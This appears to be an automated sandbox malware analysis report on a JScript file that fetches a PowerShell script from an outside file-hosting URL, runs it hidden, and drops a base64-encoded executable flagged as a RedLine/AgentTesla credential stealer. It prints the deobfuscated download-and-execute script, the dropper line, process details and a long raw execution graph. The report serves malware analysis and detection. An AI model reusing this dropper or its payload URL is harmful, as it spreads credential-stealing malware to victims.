                                                                  2024-12-20 16:42:29 UTC15831INData Raw: 24 70 3d 5b 49 4f 2e 50 61 74 68 5d 3a 3a 43 6f 6d 62 69 6e 65 28 24 65 6e 76 3a 54 45 4d 50 2c 22 78 2e 65 78 65 22 29 0d 0a 5b 49 4f 2e 46 69 6c 65 5d 3a 3a 57 72 69 74 65 41 6c 6c 42 79 74 65 73 28 24 70 2c 5b 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 22 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 2b 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75
                                                                  Data Ascii: $p=[IO.Path]::Combine($env:TEMP,"x.exe")[IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUu
                                                                  2024-12-20 16:42:29 UTC16384INData Raw: 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 7a 4d 56 59 76 73 75 41 51 67 41 41 44 6f 45 2b 67 42 41 46 4e 57 69 33 55 49 5a 6f 4d 2b 49 31 63 50 68 4d 31 4a 41 67 43 34 41 77 41 41 41 46 39 65 57 34 76 6c 58 63 49 51 41 4d 7a 4d 7a 4d 7a 4d 56 59 76 73 67 33 34 49 41 48 52 2f 69 30 59 4d 69 77 42 6d 67 7a 67 41 64 47 5a 71 45 4f 68 73 32 77 41 41 69 30 34 4d 69 55 45 4d 67 38 51 45 69 55 59 4d 69 31 59 4d 56 31 50 48 51 67 77 41 41 41 41 41 36 44 6e 58 41 41 41 7a 79 55 43 36 41 67 41 41 41 50 66 69 44 35 44 42 39 39 6b 4c 79 46 48 6f 4f 4e 73 41 41 49 76 34 55 31 66 6f 76 39 6f 41 41 49 74 47 44 49 74 56 43 49 6b 34 69 30 34 4d 69 56 45 45 69 30 59 4d 69 30 30 4d 67 38 51 51 69 55 67 49 2f 30 59 51 58 31 33 43 43 41 42 51 36 41 7a 58 41 41 43 44 78 41 54 2f 54 68 44
                                                                  Data Ascii: zMzMzMzMzMzMVYvsuAQgAADoE+gBAFNWi3UIZoM+I1cPhM1JAgC4AwAAAF9eW4vlXcIQAMzMzMzMVYvsg34IAHR/i0YMiwBmgzgAdGZqEOhs2wAAi04MiUEMg8QEiUYMi1YMV1PHQgwAAAAA6DnXAAAzyUC6AgAAAPfiD5DB99kLyFHoONsAAIv4U1fov9oAAItGDItVCIk4i04MiVEEi0YMi00Mg8QQiUgI/0YQX13CCABQ6AzXAACDxAT/ThD

                                                                  Target ID:1
                                                                  Start time:11:42:24
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\doc00290320092.jse"
                                                                  Imagebase:0x7ff708b10000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:11:42:30
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                                  Imagebase:0x7ff6cb6b0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:4
                                                                  Start time:11:42:30
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6ee680000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:11:42:33
                                                                  Start date:20/12/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                  Imagebase:0x400000
                                                                  File size:968'158 bytes
                                                                  MD5 hash:915A6F3675442C388110FB11DB36620A
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1727362900.0000000002F40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 35%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:6
                                                                  Start time:11:42:33
                                                                  Start date:20/12/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                  Imagebase:0xd00000
                                                                  File size:45'984 bytes
                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.2882351625.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Call Graph

                                                                  (rendered call graph; the recoverable caller → callee edges are listed below)
                                                                  • entry → CreateObject (three calls), Main
                                                                  • Main → EnsureTempDirectoryExists, DownloadScript, LogError, RunPowerShellScript, Quit
                                                                  • EnsureTempDirectoryExists → FolderExists, CreateFolder
                                                                  • DownloadScript → Open, Send, CreateTextFile, Write, Close, LogError
                                                                  • RunPowerShellScript → LogError, Run
                                                                  • LogError → Echo

                                                                  Script:

                                                                  Code (deobfuscated script as shown by the sandbox; indented "•" lines are the recorded runtime calls and their return values; the listing is cut off after line 43 of the script)

                                                                  var URL = "https://files.catbox.moe/gj7umd.ps1";
                                                                  var DownloadPath = "C:\\Temp\\dddddd.ps1";
                                                                  var TEMP_DIR = "C:\\Temp";
                                                                  var SUCCESS_STATUS = 200;
                                                                  var POWERSHELL_CMD = "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ";
                                                                  var shell = WScript.CreateObject ( "WScript.Shell" );
                                                                      • Windows Script Host.CreateObject("WScript.Shell") ➔
                                                                  var fileSystem = WScript.CreateObject ( "Scripting.FileSystemObject" );
                                                                      • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                                                  var http = WScript.CreateObject ( "MSXML2.XMLHTTP" );
                                                                      • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                                                  function EnsureTempDirectoryExists() {
                                                                      • EnsureTempDirectoryExists() ➔ undefined
                                                                      if ( ! fileSystem.FolderExists ( TEMP_DIR ) )
                                                                          • FolderExists("C:\Temp") ➔ false
                                                                      {
                                                                          fileSystem.CreateFolder ( TEMP_DIR );
                                                                          • CreateFolder("C:\Temp") ➔ C:\Temp
                                                                      }
                                                                  }
                                                                  function DownloadScript(url, path) {
                                                                      • DownloadScript("https://files.catbox.moe/gj7umd.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                      http.Open ( "GET", url, false );
                                                                          • Open("GET","https://files.catbox.moe/gj7umd.ps1",false) ➔ undefined
                                                                      http.Send ( );
                                                                          • Send() ➔ undefined
                                                                      if ( http.Status !== SUCCESS_STATUS )
                                                                      {
                                                                          LogError ( "Download failed with status: " + http.Status );
                                                                          return false;
                                                                      }
                                                                      try
                                                                      {
                                                                          var file = fileSystem.CreateTextFile ( path, true );
                                                                              • CreateTextFile("C:\Temp\dddddd.ps1",true) ➔
                                                                          file.Write ( http.ResponseText );
                                                                              • Write("$p=[IO.Path]::Combine($env:TEMP,"x.exe") [IO.File]::WriteAllBytes($p,[Convert]::FromBase64String("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") ➔ undefined
                                                                          file.Close ( );
                                                                              • Close() ➔ undefined
                                                                          return true;
                                                                      }
                                                                      catch ( e )
                                                                      {
                                                                          LogError ( "Error writing downloaded script: " + e.message );
                                                                          return false;
                                                                      }
                                                                  }
                                                                  function LogError(message) {
                                                                      WScript.Echo ( message );
                                                                  }
                                                                  function RunPowerShellScript(scriptPath) {
                                                                      • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                      try
                                                                      {
                                                                          var powerShellCommand = POWERSHELL_CMD + "\"" + scriptPath + "\"";
                                                                          shell.Run ( powerShellCommand, 0, true );
                                                                              • Run("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"",0,true) ➔ 0
                                                                      }
                                                                                                                              catch ( e )
                                                                                                                                45
                                                                                                                                {
                                                                                                                                  46
                                                                                                                                  LogError ( "Failed to execute PowerShell script: " + e.message );
                                                                                                                                    47
                                                                                                                                    }
                                                                                                                                      48
                                                                                                                                      }
                                                                                                                                        49
                                                                                                                                        function Main() {
                                                                                                                                        • Main() ➔ undefined
                                                                                                                                        50
                                                                                                                                        EnsureTempDirectoryExists ( );
                                                                                                                                        • EnsureTempDirectoryExists() ➔ undefined
                                                                                                                                        51
                                                                                                                                        if ( ! DownloadScript ( URL, DownloadPath ) )
                                                                                                                                        • DownloadScript("https://files.catbox.moe/gj7umd.ps1","C:\Temp\dddddd.ps1") ➔ true
                                                                                                                                        52
                                                                                                                                        {
                                                                                                                                          53
                                                                                                                                          LogError ( "Exiting script due to download failure." );
                                                                                                                                            54
                                                                                                                                            WScript.Quit ( );
                                                                                                                                              55
                                                                                                                                              }
                                                                                                                                                56
                                                                                                                                                RunPowerShellScript ( DownloadPath );
                                                                                                                                                • RunPowerShellScript("C:\Temp\dddddd.ps1") ➔ undefined
                                                                                                                                                57
                                                                                                                                                }
                                                                                                                                                  58
                                                                                                                                                  Main ( );
                                                                                                                                                  • Main() ➔ undefined
Memory Dump Source
• Source File: 00000003.00000002.1766367778.00007FFB4AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4aa00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 324935d6233f2fd89fa5ee25a2996ab888e93a420b90cdc0272b7d79cbba16f4
• Instruction ID: 1d27b8a7188be4732d31327e26947e94ab8204d6a97ebcba436372d1401b4a8b
• Opcode Fuzzy Hash: 324935d6233f2fd89fa5ee25a2996ab888e93a420b90cdc0272b7d79cbba16f4
• Instruction Fuzzy Hash: 138225A290DBC90FF796AF7888656B47FE1EF56214B1901FBD08DC7193D9189C06C3A2
Memory Dump Source
• Source File: 00000003.00000002.1766367778.00007FFB4AA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AA00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4aa00000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 338a41f86b8cd073ae813839faf84c2e78d6c56110fc6b08a1785cdb2f013b07
• Instruction ID: dbee96b873081ff398399c814eb31af98ef794ea74d33505fa7ade3d619298bc
• Opcode Fuzzy Hash: 338a41f86b8cd073ae813839faf84c2e78d6c56110fc6b08a1785cdb2f013b07
• Instruction Fuzzy Hash: 5E11EBA2E1D9064BF6ACBE28D65617A32C5FF94318B7901F9D80DD2982DE086C0742D2
Memory Dump Source
• Source File: 00000003.00000002.1765681400.00007FFB4A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4A930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffb4a930000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction ID: 2b988f6ad23953534eff47a4a6756d9dd70321514fde7af8960183fce11b94c1
• Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
• Instruction Fuzzy Hash: 8A01A77010CB0D4FD744EF0CE091AB6B3E0FB99320F10056EE58AC3652D632E882CB41

Execution Graph

Execution Coverage: 3.6%
Dynamic/Decrypted Code Coverage: 1.5%
Signature Coverage: 4.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 39

execution_graph: node and edge listing of the execution graph (function addresses with their API-call annotations, such as IsDebuggerPresent, SetUnhandledExceptionFilter, RegOpenKeyExW, GetOpenFileNameW and ShellExecuteW, and the call edges between them), rendered as an interactive graph in the original report; the raw listing is not reproduced here.
VariantClear 86820->86821 86824 42d94d timeGetTime 86820->86824 86831 47d33e 359 API calls 86820->86831 86842 42e0cc VariantClear 86820->86842 86843 408f40 VariantClear 86820->86843 86844 45e737 90 API calls 86820->86844 87928 4091b0 86820->87928 87986 40afa0 86820->87986 88012 408fc0 86820->88012 88047 408cc0 86820->88047 88061 4096a0 381 API calls 4 library calls 86820->88061 88062 40d150 TranslateAcceleratorW 86820->88062 88063 40d170 IsDialogMessageW GetClassLongW 86820->88063 88068 465124 53 API calls 86820->88068 88069 40c620 timeGetTime 86820->88069 88084 40e270 VariantClear moneypunct 86820->88084 86821->86820 86822->86817 88070 465124 53 API calls 86824->88070 86826->86817 86829->86817 86830->86817 86831->86820 86833->86817 86835->86817 86837->86820 86842->86820 86843->86820 86844->86820 86846->86817 86848->86616 86849->86614 86850->86601 86851->86607 86853 401b16 _wcslen 86852->86853 86854 4115d7 52 API calls 86853->86854 86855 401b63 86853->86855 86856 401b4b _memmove 86854->86856 86858 40d200 52 API calls 2 library calls 86855->86858 86857 4115d7 52 API calls 86856->86857 86857->86855 86858->86623 86859->86626 86861 40bc70 52 API calls 86860->86861 86862 401f31 86861->86862 86863 402560 86862->86863 86864 40256d __write_nolock 86863->86864 86865 402160 52 API calls 86864->86865 86867 402593 86865->86867 86877 4025bd 86867->86877 86938 401c90 86867->86938 86868 4026f0 52 API calls 86868->86877 86869 4026a7 86870 401b10 52 API calls 86869->86870 86876 4026db 86869->86876 86872 4026d1 86870->86872 86871 401b10 52 API calls 86871->86877 86942 40d7c0 52 API calls 2 library calls 86872->86942 86874 401c90 52 API calls 86874->86877 86876->86681 86877->86868 86877->86869 86877->86871 86877->86874 86941 40d7c0 52 API calls 2 library calls 86877->86941 86943 40f760 86878->86943 86881 410118 86881->86683 86883 42805d 86884 42806a 86883->86884 86999 431e58 86883->86999 86886 413748 _free 46 API calls 86884->86886 86887 428078 86886->86887 86888 431e58 82 API calls 
86887->86888 86889 428084 86888->86889 86889->86683 86891 4115d7 52 API calls 86890->86891 86892 401f74 86891->86892 86892->86686 86894 4019a3 86893->86894 86895 401985 86893->86895 86894->86895 86896 4019b8 86894->86896 86897 40199f 86895->86897 87754 403e10 53 API calls 86895->87754 87755 403e10 53 API calls 86896->87755 86897->86689 86900 4019c4 86900->86689 86902 40c2c7 86901->86902 86903 40c30e 86901->86903 86906 40c2d3 86902->86906 86907 426c79 86902->86907 86904 40c315 86903->86904 86905 426c2b 86903->86905 86911 40c321 86904->86911 86912 426c5a 86904->86912 86909 426c4b 86905->86909 86910 426c2e 86905->86910 87756 403ea0 52 API calls __cinit 86906->87756 87761 4534e3 52 API calls 86907->87761 87759 4534e3 52 API calls 86909->87759 86917 40c2de 86910->86917 87758 4534e3 52 API calls 86910->87758 87757 403ea0 52 API calls __cinit 86911->87757 87760 4534e3 52 API calls 86912->87760 86917->86699 86920 401a30 86919->86920 86921 401a17 86919->86921 86923 402160 52 API calls 86920->86923 86922 401a2d 86921->86922 87762 403c30 52 API calls _memmove 86921->87762 86922->86703 86925 401a3d 86923->86925 86925->86703 86927 411523 86926->86927 86928 4114ba 86926->86928 87765 4113a8 58 API calls 3 library calls 86927->87765 86933 40200c 86928->86933 87763 417f77 46 API calls __getptd_noexit 86928->87763 86931 4114c6 87764 417f25 10 API calls __mbstowcs_l_helper 86931->87764 86933->86706 86933->86707 86934->86733 86935->86736 86936->86742 86937->86742 86939 4026f0 52 API calls 86938->86939 86940 401c97 86939->86940 86940->86867 86941->86877 86942->86876 87003 40f6f0 86943->87003 86945 40f77b _strcat moneypunct 87011 40f850 86945->87011 86950 427c2a 87040 414d04 86950->87040 86952 40f7fc 86952->86950 86954 40f804 86952->86954 87027 414a46 86954->87027 86957 40f80e 86957->86881 86962 4528bd 86957->86962 86959 427c59 87046 414fe2 86959->87046 86961 427c79 86963 4150d1 _fseek 81 API calls 86962->86963 86964 452930 86963->86964 87679 452719 86964->87679 86967 452948 
86967->86883 86968 414d04 __fread_nolock 61 API calls 86969 452966 86968->86969 86970 414d04 __fread_nolock 61 API calls 86969->86970 86971 452976 86970->86971 86972 414d04 __fread_nolock 61 API calls 86971->86972 86973 45298f 86972->86973 86974 414d04 __fread_nolock 61 API calls 86973->86974 86975 4529aa 86974->86975 86976 4150d1 _fseek 81 API calls 86975->86976 86977 4529c4 86976->86977 86978 4135bb _malloc 46 API calls 86977->86978 86979 4529cf 86978->86979 86980 4135bb _malloc 46 API calls 86979->86980 86981 4529db 86980->86981 86982 414d04 __fread_nolock 61 API calls 86981->86982 86983 4529ec 86982->86983 86984 44afef GetSystemTimeAsFileTime 86983->86984 86985 452a00 86984->86985 86986 452a36 86985->86986 86987 452a13 86985->86987 86988 452aa5 86986->86988 86989 452a3c 86986->86989 86990 413748 _free 46 API calls 86987->86990 86993 413748 _free 46 API calls 86988->86993 87685 44b1a9 86989->87685 86991 452a1c 86990->86991 86994 413748 _free 46 API calls 86991->86994 86998 452aa3 86993->86998 86996 452a25 86994->86996 86995 452a9d 86997 413748 _free 46 API calls 86995->86997 86996->86883 86997->86998 86998->86883 87000 431e64 86999->87000 87001 431e6a 86999->87001 87002 414a46 __fcloseall 82 API calls 87000->87002 87001->86884 87002->87001 87004 425de2 87003->87004 87006 40f6fc _wcslen 87003->87006 87004->86945 87005 40f710 WideCharToMultiByte 87007 40f756 87005->87007 87008 40f728 87005->87008 87006->87005 87007->86945 87009 4115d7 52 API calls 87008->87009 87010 40f735 WideCharToMultiByte 87009->87010 87010->86945 87012 40f85d __cftof2_l _strlen 87011->87012 87014 40f7ab 87012->87014 87059 414db8 87012->87059 87015 4149c2 87014->87015 87230 414904 87015->87230 87017 40f7e9 87017->86950 87018 40f5c0 87017->87018 87019 40f5cd _strcat __write_nolock _memmove 87018->87019 87020 414d04 __fread_nolock 61 API calls 87019->87020 87021 40f691 __tzset_nolock 87019->87021 87023 425d11 87019->87023 87318 4150d1 87019->87318 87020->87019 87021->86952 87024 4150d1 _fseek 81 
API calls 87023->87024 87025 425d33 87024->87025 87026 414d04 __fread_nolock 61 API calls 87025->87026 87026->87021 87028 414a52 __wfsopen 87027->87028 87029 414a64 87028->87029 87030 414a79 87028->87030 87438 417f77 46 API calls __getptd_noexit 87029->87438 87033 415471 __lock_file 47 API calls 87030->87033 87037 414a74 __wfsopen 87030->87037 87032 414a69 87439 417f25 10 API calls __mbstowcs_l_helper 87032->87439 87035 414a92 87033->87035 87422 4149d9 87035->87422 87037->86957 87507 414c76 87040->87507 87042 414d1c 87043 44afef 87042->87043 87672 442c5a 87043->87672 87045 44b00d 87045->86959 87047 414fee __wfsopen 87046->87047 87048 414ffa 87047->87048 87049 41500f 87047->87049 87676 417f77 46 API calls __getptd_noexit 87048->87676 87051 415471 __lock_file 47 API calls 87049->87051 87053 415017 87051->87053 87052 414fff 87677 417f25 10 API calls __mbstowcs_l_helper 87052->87677 87055 414e4e __ftell_nolock 51 API calls 87053->87055 87056 415024 87055->87056 87678 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87056->87678 87058 41500a __wfsopen 87058->86961 87060 414dd6 87059->87060 87061 414deb 87059->87061 87070 417f77 46 API calls __getptd_noexit 87060->87070 87061->87060 87063 414df2 87061->87063 87072 41b91b 79 API calls 11 library calls 87063->87072 87064 414ddb 87071 417f25 10 API calls __mbstowcs_l_helper 87064->87071 87067 414e18 87068 414de6 87067->87068 87073 418f98 87067->87073 87068->87012 87070->87064 87071->87068 87072->87067 87094 414139 87073->87094 87075 418fa8 87076 418fb3 87075->87076 87077 418fca 87075->87077 87104 417f77 46 API calls __getptd_noexit 87076->87104 87078 418fce 87077->87078 87088 418fdb __flsbuf 87077->87088 87105 417f77 46 API calls __getptd_noexit 87078->87105 87081 41903c 87082 4190cb 87081->87082 87083 41904b 87081->87083 87084 41b7b2 __write 77 API calls 87082->87084 87085 419062 87083->87085 87091 41907f 87083->87091 87087 418fb8 87084->87087 87115 41b7b2 87085->87115 87087->87068 87088->87081 87088->87087 87090 
419031 87088->87090 87106 42064c 87088->87106 87090->87081 87101 420603 87090->87101 87091->87087 87140 420519 51 API calls 6 library calls 87091->87140 87095 414145 87094->87095 87096 41415a 87094->87096 87141 417f77 46 API calls __getptd_noexit 87095->87141 87096->87075 87098 41414a 87142 417f25 10 API calls __mbstowcs_l_helper 87098->87142 87100 414155 87100->87075 87102 416b04 __malloc_crt 46 API calls 87101->87102 87103 420618 87102->87103 87103->87081 87104->87087 87105->87087 87107 420668 87106->87107 87108 420659 87106->87108 87111 420686 87107->87111 87144 417f77 46 API calls __getptd_noexit 87107->87144 87143 417f77 46 API calls __getptd_noexit 87108->87143 87110 42065e 87110->87090 87111->87090 87113 420679 87145 417f25 10 API calls __mbstowcs_l_helper 87113->87145 87116 41b7be __wfsopen 87115->87116 87117 41b7e1 87116->87117 87118 41b7c6 87116->87118 87120 41b7ed 87117->87120 87123 41b827 87117->87123 87222 417f8a 46 API calls __getptd_noexit 87118->87222 87224 417f8a 46 API calls __getptd_noexit 87120->87224 87121 41b7cb 87223 417f77 46 API calls __getptd_noexit 87121->87223 87146 41ae56 87123->87146 87125 41b7f2 87225 417f77 46 API calls __getptd_noexit 87125->87225 87128 41b7fa 87226 417f25 10 API calls __mbstowcs_l_helper 87128->87226 87129 41b82d 87131 41b83b 87129->87131 87132 41b84f 87129->87132 87156 41b0b5 87131->87156 87227 417f77 46 API calls __getptd_noexit 87132->87227 87133 41b7d3 __wfsopen 87133->87087 87136 41b847 87229 41b87e LeaveCriticalSection __unlock_fhandle 87136->87229 87137 41b854 87228 417f8a 46 API calls __getptd_noexit 87137->87228 87140->87087 87141->87098 87142->87100 87143->87110 87144->87113 87145->87110 87147 41ae62 __wfsopen 87146->87147 87148 41aebc 87147->87148 87149 4182cb __lock 46 API calls 87147->87149 87150 41aec1 EnterCriticalSection 87148->87150 87151 41aede __wfsopen 87148->87151 87152 41ae8e 87149->87152 87150->87151 87151->87129 87153 41aeaa 87152->87153 87154 41ae97 InitializeCriticalSectionAndSpinCount 
87152->87154 87155 41aeec ___lock_fhandle LeaveCriticalSection 87153->87155 87154->87153 87155->87148 87157 41b0c4 __write_nolock 87156->87157 87158 41b119 87157->87158 87159 41b0fa 87157->87159 87192 41b0ef 87157->87192 87162 41b175 87158->87162 87163 41b158 87158->87163 87160 417f8a __write_nolock 46 API calls 87159->87160 87164 41b0ff 87160->87164 87161 41a208 __write_nolock 5 API calls 87165 41b7b0 87161->87165 87167 41b18b 87162->87167 87168 41b17c 87162->87168 87166 417f8a __write_nolock 46 API calls 87163->87166 87169 417f77 __mbstowcs_l_helper 46 API calls 87164->87169 87165->87136 87170 41b15d 87166->87170 87173 42064c __write_nolock 46 API calls 87167->87173 87171 420494 __lseeki64_nolock 48 API calls 87168->87171 87172 41b106 87169->87172 87174 417f77 __mbstowcs_l_helper 46 API calls 87170->87174 87175 41b188 87171->87175 87176 417f25 __mbstowcs_l_helper 10 API calls 87172->87176 87177 41b191 87173->87177 87178 41b165 87174->87178 87175->87167 87176->87192 87179 41b433 87177->87179 87181 417a69 __getptd 46 API calls 87177->87181 87180 417f25 __mbstowcs_l_helper 10 API calls 87178->87180 87182 41b6e3 WriteFile 87179->87182 87183 41b442 87179->87183 87180->87192 87185 41b1ac GetConsoleMode 87181->87185 87186 41b716 GetLastError 87182->87186 87216 41b415 87182->87216 87184 41b4fd 87183->87184 87193 41b455 87183->87193 87189 41b5d7 87184->87189 87190 41b50a 87184->87190 87185->87179 87188 41b1d5 87185->87188 87186->87216 87187 41b761 87187->87192 